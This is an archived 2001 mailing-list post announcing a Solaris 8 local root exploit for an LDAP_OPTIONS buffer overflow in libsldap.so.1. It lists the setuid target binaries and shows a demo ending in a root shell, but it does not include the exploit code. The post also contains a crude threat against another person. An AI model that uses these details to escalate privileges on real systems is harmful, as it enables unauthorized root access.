Hi,

I wish to free this one since it has been made public by some ppl. libsldap hole has been known for long. As far as I know, swayat_private did actually find the hole several months ago and generously let me know about it. All propz go to him. Thanks bro.

Exploit is plain simple, tested on an Ultra10 and an Enterprise 3500 with success.

I usually support the anti-sec movement but I got my reasons to publish the exploit. If you want to know why, please do mail me.

$ ./libsldap-exp
libsldap.so.1 $LDAP_OPTIONS enviroment variable buffer overflow
Exploit code: noirat_private
Bug discovery: swayat_private
Usage: ./libsldap-exp target#
target#: 0, /usr/bin/passwd Solaris8, Sparc64
target#: 1, /usr/bin/nispasswd Solaris8, Sparc64
target#: 2, /usr/bin/yppasswd Solaris8, Sparc64
target#: 3, /usr/bin/chkey Solaris8, Sparc64
target#: 4, /usr/lib/sendmail Solaris8, Sparc64
$ ./libsldap-exp 0
# id
uid=0(root) gid=0(root)
#

PS: t(L)amer sahin, you are going to get such a kick in the ass that it will come out of your mouth. Just wanted you to know : )

Greetings: sway, anathema, gov-boi, www.hack.co.za, ertan_kurt, cronos

cheers,
noir
This archive was generated by hypermail 2b30 : Thu Jul 05 2001 - 11:00:20 PDT